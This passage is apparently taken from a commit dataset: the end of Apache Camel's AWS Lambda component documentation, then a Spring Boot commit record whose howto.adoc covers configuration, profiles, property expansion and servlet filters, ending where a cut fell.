No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. 
|Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this 
https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5692b83a6f428b8975934a74234ec7601403c2c8","subject":"Add note on sanitizing values","message":"Add note on sanitizing values\n\nCloses gh-13138\n","repos":"zhanhb\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,kdvolder\/spring-boot,ptahchiev\/spring-boot,felipeg48\/spring-boot,mbenson\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,mbenson\/spring-boot,zhanhb\/spring-boot,bclozel\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,felipeg48\/spring-boot,NetoDevel\/spring-boot,drumonii\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,ilayaperumalg\/spring-boot,bclozel\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,Buzzardo\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,vpavic\/spring-boot,tiarebalbi\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,tiarebalbi\/spring-boot,felipeg48\/spring-boot,yangdd1205\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,chrylis\/spring-boot,htynkn\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,eddumelendez\/spring-boot,NetoDevel\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,tsachev\/spring-boot,lburgazzoli\/spring-boot,bclozel\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,shakuzen\/spring-boot,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,joshiste\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,royclarkson\/spring
-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,jxblum\/spring-boot,lburgazzoli\/spring-boot,kdvolder\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,zhanhb\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,michael-simons\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,jxblum\/spring-boot,aahlenst\/spring-boot,donhuvy\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,ptahchiev\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,bclozel\/spring-boot,yangdd1205\/spring-boot,mbenson\/spring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,drumonii\/spring-boot,mbenson\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,donhuvy\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' type of questions\nthat often arise when using Spring Boot. This is by no means an exhaustive list, but it\ndoes cover quite a lot.\n\nIf you are having a specific problem that we don't cover here, you might want to check out\nhttp:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer; this is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe're also more than happy to extend this section; If you want to add a '`how-to`' you\ncan send us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot application\n\n\n[[howto-failure-analyzer]]\n=== Create your own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\ninto a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such analyzer for application context related exceptions, JSR-303\nvalidations and more. 
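For illustration, here is a minimal sketch of such an analyzer; `ProjectConstraintViolationException`\nis a hypothetical application exception, not a Spring Boot type:\n\n[source,java,indent=0]\n----\n\tpublic class ProjectConstraintViolationFailureAnalyzer\n\t\t\textends AbstractFailureAnalyzer<ProjectConstraintViolationException> {\n\n\t\t@Override\n\t\tprotected FailureAnalysis analyze(Throwable rootFailure,\n\t\t\t\tProjectConstraintViolationException cause) {\n\t\t\t\/\/ Turn the raw exception into a readable description and a suggested action\n\t\t\treturn new FailureAnalysis(cause.getMessage(),\n\t\t\t\t\t\"Review the project constraints and update your configuration\", cause);\n\t\t}\n\n\t}\n----\n\n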
Creating your own is straightforward.\n\n`AbstractFailureAnalyzer`, used in the sketch above, is a convenient extension of\n`FailureAnalyzer` that checks for the presence of a specified exception type in the\nexception to handle. You can extend from it so that your implementation gets a chance to\nhandle the exception only when it is actually present. If for whatever reason you can't\nhandle the exception, return `null` to give another implementation a chance to handle it.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`;\nthe following registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot auto-configuration\nThe Spring Boot auto-configuration tries its best to '`do the right thing`', but\nsometimes things fail and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You will see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` there is also an `autoconfig` endpoint that renders the report\nin JSON. Use that to debug the application and see what features have been added (and\nwhich have not) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. Some\nrules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources, in particular the\n `+@Conditional*+` annotations to find out what features they enable and when. Add\n `--debug` to the command line or a System property `-Ddebug` to get a log on the\n console of all the auto-configuration decisions that were made in your app. In a running\n Actuator app look at the `autoconfig` endpoint ('`\/autoconfig`' or the JMX equivalent) for\n the same information.\n* Look for classes that are `@ConfigurationProperties` (e.g.\n {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\n and read from there the available external configuration options. The\n `@ConfigurationProperties` annotation has a `name` attribute which acts as a prefix to external\n properties, thus `ServerProperties` has `prefix=\"server\"` and its configuration properties\n are `server.port`, `server.address` etc. In a running Actuator app look at the\n `configprops` endpoint.\n* Look for use of `RelaxedPropertyResolver` to pull configuration values explicitly out of the\n `Environment`. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`. This is less\n flexible than the `RelaxedPropertyResolver` approach, but does allow some relaxed binding,\n specifically for OS environment variables (so `CAPITALS_AND_UNDERSCORES` are synonyms\n for `period.separated`).\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\n response to SpEL expressions, normally evaluated with placeholders resolved from the\n `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext before it starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. 
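As a minimal sketch, a custom initializer might look like the following (the property it\nadds is purely illustrative):\n\n[source,java,indent=0]\n----\n\tpublic class MyContextInitializer\n\t\t\timplements ApplicationContextInitializer<ConfigurableApplicationContext> {\n\n\t\t@Override\n\t\tpublic void initialize(ConfigurableApplicationContext applicationContext) {\n\t\t\t\/\/ Runs before the context is refreshed, so beans are not available yet\n\t\t\tapplicationContext.getEnvironment().getPropertySources().addLast(new MapPropertySource(\n\t\t\t\t\t\"custom\", Collections.<String, Object>singletonMap(\"my.key\", \"my-value\")));\n\t\t}\n\n\t}\n----\n\n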
There is more than one way to register additional ones:\n\n* Programmatically per application by calling the `addListeners` and `addInitializers`\n methods on `SpringApplication` before you run it.\n* Declaratively per application by setting `context.initializer.classes` or\n `context.listener.classes`.\n* Declaratively for all applications by adding a `META-INF\/spring.factories` and packaging\n a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (even\nsome before the context is created), and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n_<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>_ in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, this example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` will already have been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. This example adds the `custom-resource` property source at the\nend of the list so that a key defined in any of the usual other locations takes\nprecedence. A custom implementation may of course define a different order.\n\nNOTE: While using `@PropertySource` on your `@SpringBootApplication` seems convenient and\neasy enough to load a custom resource in the `Environment`, we do not recommend it as\nSpring Boot prepares the `Environment` before the `ApplicationContext` is refreshed. Any\nkey defined via `@PropertySource` will be loaded too late to have any effect on\nauto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext hierarchy (adding a parent or root context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See _<<spring-boot-features.adoc#boot-features-fluent-builder-api>>_\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a non-web application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method, but also bootstrap a Spring application to set up\nthe infrastructure to use, then it's easy with the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class depending on whether it\nthinks it needs a web application or not. The first thing you can do to help it is to just\nleave the servlet API dependencies off the classpath. If you can't do that (e.g. 
you are\nrunning 2 applications from the same code base) then you can explicitly call\n`setWebEnvironment(false)` on your `SpringApplication` instance, or set the\n`applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a\n`CommandLineRunner` and dropped into the context as a `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties & configuration\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically expand properties at build time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them using the existing build configuration\ninstead. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic property expansion using Maven\nYou can automatically expand properties from the Maven project using resource\nfiltering. If you use the `spring-boot-starter-parent` you can then refer to your\nMaven '`project properties`' via `@..@` placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (i.e. no filtering is applied on\n`src\/test\/resources`).\n\nTIP: The `spring-boot:run` can add `src\/main\/resources` directly to the classpath\n(for hot reloading purposes) if you enable the `addResources` flag. This circumvents\nthe resource filtering and this feature. You can use the `exec:java` goal instead\nor customize the plugin's configuration, see the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you don't use the starter parent, in your `pom.xml` you need (inside the `<build\/>`\nelement):\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nand (inside `<plugins\/>`):\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you are using standard Spring\nplaceholders in your configuration (e.g. `${foo}`). These may be expanded by the build if\nthat property is not set to `false`.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic property expansion using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties via placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine` which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. 
To use Spring property placeholders together with automatic expansion,\nthe Spring property placeholders need to be escaped like `\\${..}`.\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters) so you can use its Java API as\nyou create the application to modify its behavior. Or you can externalize the\nconfiguration using properties in `+spring.main.*+`. E.g. in `application.properties` you\nmight have:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-environment=false\n\tspring.main.banner-mode=off\n----\n\nand then the Spring Boot banner will not be printed on startup, and the application will\nnot be a web application.\n\nNOTE: The example above also demonstrates how flexible binding allows the use of\nunderscores (`_`) as well as dashes (`-`) in property names.\n\nProperties defined in external configuration override the values specified via the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`. Let's\nconsider this application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nused with the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application will _now_ show the banner (as overridden by configuration) and use\nthree sources for the `ApplicationContext` (in that order): `demo.MyApp`, `com.acme.Config`,\n`com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the location of external properties of an application\nBy default properties from different sources are added to the Spring `Environment` in a\ndefined order (see _<<spring-boot-features.adoc#boot-features-external-config>>_ in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods, and those added using `setSources()`, are inspected to see if they have\n`@PropertySources`, and if they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower priority than any added using the default locations (e.g.\n`application.properties`), system properties, environment variables or the command line.\n\nYou can also provide System properties (or environment variables) to change the behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`), defaults to `application` as the root of\n the file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`) is the file to load (e.g. a classpath\n resource or a URL). A separate `Environment` property source is set up for this document\n and it can be overridden by system properties, environment variables or the\n command line.\n\nNo matter what you set in the environment, Spring Boot will always load\n`application.properties` as described above. 
If YAML is used then files with the '`.yml`'\nextension are also added to the list by default.\n\nSpring Boot logs the configuration files that are loaded at `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`short`' command line arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can easily enable this by using\nplaceholders in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you are inheriting from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (i.e.\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttp:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case the port binding will work in a PaaS environment like Heroku\nand Cloud Foundry, since in those two platforms the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for external properties\nYAML is a superset of JSON and as such is a very convenient syntax for storing external\nproperties in a hierarchical format. E.g.\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and stick it in the root of your classpath, and\nalso add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis 1-level deep and has period-separated keys, a lot like people are used to with\n`Properties` files in Java.\n\nThe example YAML above corresponds to an `application.properties` file\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee _<<spring-boot-features.adoc#boot-features-external-config-yaml>>_ in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the active Spring profiles\nThe Spring `Environment` has an API for this, but normally you would set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`). 
E.g.\nlaunch your application with a `-D` argument (remember to put it before the main class\nor jar archive):\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot you can also set the active profile in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting,\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee _<<spring-boot-features.adoc#boot-features-profiles>>_ in\nthe '`Spring Boot features`' section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change configuration depending on the environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` and if any of those profiles is active that document is\nincluded in the final merge (otherwise not).\n\nExample:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn this example the default port is 9000, but if the Spring profile '`development`' is\nactive then the port is 9001, and if '`production`' is active then it is 0.\n\nThe YAML documents are merged in the order they are encountered (so later values override\nearlier ones).\n\nTo do the same thing with properties files you can use `application-${profile}.properties`\nto specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover built-in options for external properties\nSpring Boot binds external properties from `application.properties` (or `.yml`) (and\nother places) into an application at runtime. There is not (and technically cannot be)\nan exhaustive list of all supported properties in a single location because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations, as well as the occasional use of\n`RelaxedPropertyResolver`.\n\n\n\n[[howto-embedded-servlet-containers]]\n== Embedded servlet containers\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter or Listener to an application\nThere are two ways to add `Servlet`, `Filter`, `ServletContextListener` and the other\nlisteners supported by the Servlet spec to your application. 
You can either provide\nSpring beans for them, or enable scanning for Servlet components.\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter or Listener using a Spring bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` provide a `@Bean` definition for it.\nThis can be very useful when you want to inject configuration or dependencies. However,\nyou must be very careful that they don't cause eager initialization of too many other\nbeans because they have to be installed in the container very early in the application\nlifecycle (e.g. it's not a good idea to have them depend on your `DataSource` or JPA\nconfiguration). You can work around restrictions like that by initializing them lazily\nwhen first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets` you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or `ServletRegistrationBean` instead of or as well as\nthe underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, it will match\n`FORWARD`,`INCLUDE` and `REQUEST`. If async has been enabled, it will match `ASYNC` as\nwell.\n\nIf you are migrating a filter that has no `dispatcher` element in `web.xml` you will\nneed to specify a `dispatcherType` yourself:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilterRegistration() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setDispatcherTypes(DispatcherType.REQUEST);\n\t\t....\n\n\t\treturn registration;\n\t}\n----\n====\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described above>> any `Servlet`\nor `Filter` beans will be registered with the servlet container automatically. To disable\nregistration of a particular `Filter` or `Servlet` bean create a registration bean for it\nand mark it as disabled. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners using classpath scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` will scan from the package\nof the annotated class.\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP port\nIn a standalone application the main HTTP port defaults to `8080`, but can be set with\n`server.port` (e.g. in `application.properties` or as a System property). Thanks to\nrelaxed binding of `Environment` values you can also use `SERVER_PORT` (e.g. 
